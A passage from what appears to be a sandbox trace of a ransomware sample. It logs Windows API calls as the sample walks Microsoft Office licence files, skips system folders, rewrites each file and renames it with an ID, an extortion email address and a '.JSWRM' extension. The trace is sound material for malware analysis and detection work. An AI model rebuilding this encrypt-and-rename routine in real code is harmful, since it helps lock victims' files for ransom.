(HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0103.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0103.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0103.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.845] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11163) returned 1 [0103.845] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b90) returned 0x24c1d0 [0103.845] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b90, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b90, lpOverlapped=0x0) returned 1 [0103.848] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.848] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b90, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b90, lpOverlapped=0x0) returned 1 [0103.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.848] CloseHandle (hObject=0x45c) returned 1 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0103.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0103.848] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0103.848] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0103.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0103.848] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.848] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0103.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0103.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0103.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0103.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0103.849] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4919fee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4919fee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4a97702, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x54df, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial-ppd.xrm-ms", cAlternateFileName="HOCCAE~1.XRM")) returned 1 [0103.849] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0103.849] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0103.850] lstrcmpiW (lpString1="HomeStudentR_Trial-ppd.xrm-ms", lpString2="msocache") returned -1 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241308, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0103.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.850] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0103.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.851] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21727) returned 1 [0103.851] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x54d0) returned 0x24c1d0 [0103.851] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x54d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x54d0, lpOverlapped=0x0) returned 1 [0103.875] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.875] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x54d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x54d0, lpOverlapped=0x0) returned 1 [0103.875] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.875] CloseHandle (hObject=0x45c) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0103.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0103.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0103.876] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0103.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0103.876] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.876] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0103.900] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe47e8ce2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe47e8ce2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe48f3d44, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial-ul-oob.xrm-ms", cAlternateFileName="HO7EC9~1.XRM")) returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0103.900] lstrcmpiW (lpString1="HomeStudentR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0103.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0103.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0103.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0103.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0103.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0103.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0103.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0103.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0103.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0103.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0103.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0103.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0103.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0103.901] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0103.901] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11616) returned 1 [0103.901] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0103.901] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0103.904] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0103.904] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0103.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0103.904] CloseHandle (hObject=0x45c) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0103.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0103.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0103.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0103.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0103.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0103.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0103.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0103.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0103.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0103.904] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeStudentR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homestudentr_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0103.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0103.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0103.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0103.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0103.905] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0103.905] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4919fee, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4919fee, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe49d8b7d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b9f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="HomeStudentR_Trial2-pl.xrm-ms", cAlternateFileName="HOFD0B~1.XRM")) returned 1 [0103.905] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2=".") returned 1 [0103.905] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="..") returned 1 [0103.905] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="...") returned 1 [0103.905] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="windows") returned -1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="recovery") returned -1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="perflogs") returned -1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="documents and settings") returned 1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="system volume information") returned -1 [0103.906] lstrcmpiW (lpString1="HomeStudentR_Trial2-pl.xrm-ms", lpString2="msocache") returned -1 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="HomeStudentR_Trial2-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241060, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HomeStudentR_Trial2-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0103.906] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0103.906] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0103.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 